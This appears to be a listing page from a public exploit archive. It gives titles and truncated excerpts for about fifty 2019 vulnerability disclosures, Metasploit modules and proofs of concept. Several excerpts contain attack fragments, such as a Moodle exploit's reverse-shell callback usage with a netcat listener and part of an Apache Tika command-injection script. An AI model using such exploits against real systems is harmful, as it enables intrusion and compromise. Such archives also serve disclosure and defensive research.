Netartmedia Real Estate Portal 5.0 - SQL Injection

Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/realestate/ Demo Site: https://www.phpscriptdemos.com/realestate/ Version: 5.0 Tested on: Kali Linux CVE: N/A Description: The...

Google Chrome < M73 - FileSystemOperationRunner Use-After-Free

There's a comment in FileSystemOperationRunner::BeginOperation OperationID FileSystemOperationRunner::BeginOperation std::uniqueptr operation OperationID id = nextoperationid++; // TODOhttps://crbug.com/864351: Diagnostic to determine whether OperationID // wrap-around is occurring in the wild...

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Jenkins ACL Bypass and Metaprogramming RCE', 'Description' = %q This module exploits a vulnerability in Jenkins dynamic routing to bypass the...

Google Chrome < M73 - Double-Destruction Race in StoragePartitionService

There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback from the same BindingSet, which...

MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting

Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Date: 3/8/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1231 Version: 1.32 Tested on: Ubuntu 18.04 CVE: CVE-2019-9650 1. Description: This plugin...

Netartmedia PHP Mall 4.1 - SQL Injection

Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/mall/ Demo Site: https://www.phpscriptdemos.com/mall/ Version: 4.1 Tested on: Kali Linux CVE: N/A Description: PHP Mall is one of the...

libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons

When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit values directly. libseccomp offers both bitwise comparisons NE, EQ, MASKEDEQ and arithmetic comparisons LT, LE, GE, GT. Bitwise comparisons...

Google Chrome < M73 - MidiManagerWin Use-After-Free

MidiManagerWin uses a similar instanceid mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. However, this instanceid is an int, and there is no check that it hasn't overflowed, unlike i...

Gila CMS 1.9.1 - Cross-Site Scripting

Exploit Title: Gila CMS search Cross Site Scripting Google Dork: intext:"Powered By Gila CMS" Date: 11.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://gilacms.com Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip Demo Site: https://gilacms.com/demo/ Version:...

Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML

!-- Windows: Windows: IE11 VBScript execution policy bypass in MSHTML Platform: Windows 10 1809 not tested earlier Class: Security Feature Bypass Summary: MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which...

WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service

Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit Date: 16.03.2019 Vendor Homepage:http://www.winavi.com Software Link: http://www.winavi.com/user/download/WinAVIiPod3GPMP4PSPConverter.exe Exploit Author: Achilles Tested Version: 4.4.2 Tested on: Windows XP SP3 EN Windows 7...

BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'zlib' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell @deflater = nil...

TheCarProject 2 - Multiple SQL Injection

=========================================================================================== Exploit Title: TheCarProject v2 - 'manid' SQL Inj. Dork: N/A Date: 17-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://thecarproject.org/ Software Link:...

WinMPG Video Convert 9.3.5 - Denial of Service

Exploit Title: WinMPG Video Convert Local Dos Exploit Date: 15.03.2019 Vendor Homepage:http://www.winmpg.com Software Link: http://www.winmpg.com/down/WinMPGVideoConvert.zip Exploit Author: Achilles Tested Version: 9.3.5 and older ones Tested on: Windows XP SP3 EN 1.- Run python code :WinMPG.py 2...

Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow

Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow Date: March 14, 2019 Exploit Author: Joseph McDonagh Vendor Homepage: N/A Software Link: N/A Version: Mail Carrier 2.5.1 Tested on: Windows Vista Home Basic SP2 CVE: None !/usr/bin/python This script started from PWK, Chapter 6 I a...

Moodle 3.4.1 - Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

Laundry CMS - Multiple Vulnerabilities

=========================================================================================== Exploit Title: Laundry CMS clothcode SQL Inj. Dork: N/A Date: 09-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://laundry.rpcits.co.in/ Software Link: https://sourceforge.net/projects/laundr...

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

ICE HRM 23.0 - Multiple Vulnerabilities

=========================================================================================== Exploit Title: ICE HRM - ’ob’ SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link: https://sourceforge.net/projects/icehrm/ Version: v23.0...

Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities

Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities Discovery Date: 2018-12-05 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://www.vembu.com/ Software Link : N/A Google Dork: N/A Version: 4.4.0 CVE : CVE-2014-10078,CVE-2014-10079 Description StoreGrid...

NetData 1.13.0 - HTML Injection

Author: Marcelo Vázquez aka s4vitar NetData v1.13.0 HTML Injection Vulnerability Exploit Title: NetData v1.13.0 HTML Injection Vulnerability Date: 2019-03-14 Exploit Author: Marcelo Vázquez aka s4vitar Collaborators: Victor Lasa aka vowkin Vendor Homepage: https://my-netdata.io/ Software Link:...

FTPGetter Standard 5.97.0.177 - Remote Code Execution

Exploit Title: FTPGetter Standard - v.5.97.0.177 Remote Code Execution Date: 05/03/2019 Exploit Author: https://github.com/w4fz5uck5 | @w4fz5uck5 Vendor Homepage: https://www.ftpgetter.com Software Link: https://www.ftpgetter.com/ftpgettersetup.exe Version: v.5.97.0.177 Tested on: Windows 7 x64 C...

Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)

history.pushState'', 't00t', 'index.php' input type="hidden" name="dbTableU...

Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution

Exploit Title: Pegasus extrafields.php Plugin Remote Code Execution Date: 14 March 2019 Exploit Author: R3zk0n Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms Software Link: N/A Version: 1.0 Tested on: Linux CVE : N/A The Pegasus CMS is vulnerable to directory travaseral and Remote cod...

Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

""" Exploit Title: Apache UNO API RCE Date: 2018-09-18 Exploit Author: sud0woodo Vendor Homepage: https://www.apache.org/ Software Link: https://www.openoffice.org/api/ Version: LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 but really any version with the UNO API included Tested on: Ubuntu Mate...

WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

============================================= MGC ALERT 2019-001 - Original release date: February 06, 2019 - Last revised: March 13, 2019 - Discovered by: Manuel García Cárdenas - Severity: 7/10 CVSS Base Score - CVE-ID: CVE-2019-9618 ============================================= I. VULNERABILIT...

elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'elFinder PHP Connector exiftran Command Injection', 'Description' = %q This module exploits a command injection vulnerability in elFinder version...

pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting

Exploit Title: pfSense 2.4.4-p1 HAProxy Package 0.5914 - Stored Cross-Site Scripting Date: 13.02.2019 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://www.pfsense.org Version: 2.4.4-p1/0.5914 Software Link: N/A Google Dork: N/A CVE:2019-8953 Introduction pfSense® software is a free...

Microsoft Windows - '.reg' File / Dialog Box Message Spoofing

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt + ISR: ApparitionSec Vendor www.microsoft.com Product A file with the .reg file extension is a Registration file...

Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution

Exploit Title: Microsoft Windows CVE-2019-0541 MSHTML Engine "Edit" Remote Code Execution Vulnerability Google Dork: N/A Date: March, 13 2019 Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: http://www.microsoft.com/ Version: Windows 7 SP1, Server 2008...

Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal

Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal Google Dork: N/A Date: 4/27/2019 Exploit Author: Kevin Randall Vendor Homepage: https://www.coreftp.com Software Link: http://www.coreftp.com/server/index.html Version: Firmware: CoreFTP Server FTP / SFTP Serv...

Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal

Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 MDTM Directory Traversal Google Dork: N/A Date: 3/13/2019 Exploit Author: Kevin Randall Vendor Homepage: https://www.coreftp.com Software Link: http://www.coreftp.com/server/index.html Version: Firmware: CoreFTP Server FTP / SFTP Serv...

Apache Tika-server < 1.18 - Command Injection

Description: This is a PoC for remote command execution in Apache Tika-server. Versions Affected: Tika-server versions " print "Example: python CVE-2018-1335.py localhost 9998 calc.exe" else: host = sys.argv1 port = sys.argv2 cmd = sys.argv3 url = host+":"+strport+"/meta" headers =...

PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)

Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery Add Admin Google Dork: N/A Date: 10-03-2019 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://github.com/piluscart Software Link:...

Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)

Exploit Title: Core FTP 2.0 build 653 - 'PBSZ' - Unauthenticated - Denial of Service PoC Date: 2019-03-12 Exploit Author: Hodorsec [email protected] / [email protected] Vendor Homepage: http://www.coreftp.com/ Software Link: http://coreftp.com/server/download/archive/CoreFTPServer653.exe...

PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution

!/bin/bash echo -e "\n\e00;33m++ \e00m" echo -e "\e00;32m Authenticated PRTG network Monitor remote code execution \e00m" echo -e "\e00;33m++ \e00m" echo -e "\e00;32m Date: 11/03/2019 \e00m" echo -e "\e00;33m++ \e00m" echo -e "\e00;32m Author: https://github.com/M4LV0 [email protected]...

Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution

!/usr/bin/env python Exploit Title: FlexPaper PHP Publish Service = 2.3.6 RCE Date: March 2019 Exploit Author: Red Timmy Security - redtimmysec.wordpress.com Vendor Homepage: https://flowpaper.com/download/ Version: = 2.3.6 Tested on: Linux/Unix CVE : CVE-2018-11686 Disclamer: This exploit is for...

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak

include include include include include include include include include include include include include include Exploit Title: Linux Kernel 4.4 Ubuntu 16.04 - Leak kernel pointer in sndtimeruserccallback Google Dork: - Date: 2019-03-11 Exploit Author: wally0813 Vendor Homepage: - Software Link: -...

Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Liferay CE Portal Tomcat %q This module uses the Liferay CE Portal Groovy script console to execute OS commands. The Groovy...

NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)

Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Discovery Date: 2019-03-11 Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1 Tested on: Windows XP SP3...

OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OpenKM Document Management %q Versions of the OpenKM Document Management 'AkkuS ' , Vulnerability Discovery, PoC & Msf Module 'References' = 'URL'...

DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery

Exploit title: DirectAdmin v1.55 - CSRF via CMDACCOUNTADMIN Admin Panel Date: 03/03/2019 Exploit Author: ManhNho Vendor Homepage: https://www.directadmin.com/ Software Link: https://www.directadmin.com/ Demo Link: https://www.directadmin.com:2222/CMDACCOUNTADMIN Version: 1.55 CVE: CVE-2019-9625...

OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting

Exploit Title: OrientDB 3.0.17 GA Community Edition March 7th, 2019 | Multiple Vulnerabilities Date: 07.03.2019 Exploit Author: Ozer Goker Vendor Homepage: https://orientdb.org Software Link: https://orientdb.org/download Version: 3.0.17 GA Community Edition March 7th, 2019 Introduction OrientDB ...

Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)

PS4 6.20 WebKit Code Execution PoC ============== This repo contains a proof-of-concept PoC RCE exploit targeting the PlayStation 4 on firmware 6.20 leveraging CVE-2018-4441. The exploit first establishes an arbitrary read/write primitive as well as an arbitrary object address leak in wkexploit.j...

McAfee ePO 5.9.1 - Registered Executable Local Access Bypass

Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass Date: 2019-03-07 Exploit Author: @leonjza Vendor Homepage: https://www.mcafee.com/ Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html Version: ePO v5.9.1 Tested on: Windows Server 2012...

Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupal RESTful Web Services unserialize RCE', 'Description' = %q This module exploits a PHP unserialize vulnerability in Drupal RESTful Web...

QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'base64' class MetasploitModule 'QNAP TS-431 QTS %q This module creates a virtual web server and uploads the php payload into it. Admin privileges cannot access a...

Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Imperva SecureSphere PWS Command Injection', 'Description' = %q This module exploits a command injection vulnerability in Imperva SecureSphere...

FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'FreeBSD Intel SYSRET Privilege Escalation', 'Description' = %q This module exploits a vulnerability in the FreeBSD kernel, when running on 64-bit...

Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)

!/usr/bin/python Exploit Title: Anyburn 4.3 - 'Copy disc to image file' Buffer Overflow - UNICODESEH Version: 4.3 Date: 07-03-2019 Author: Hodorsec [email protected] / [email protected] Vendor Homepage: http://www.anyburn.com/ Software Link: http://www.anyburn.com/download.php Tested on:...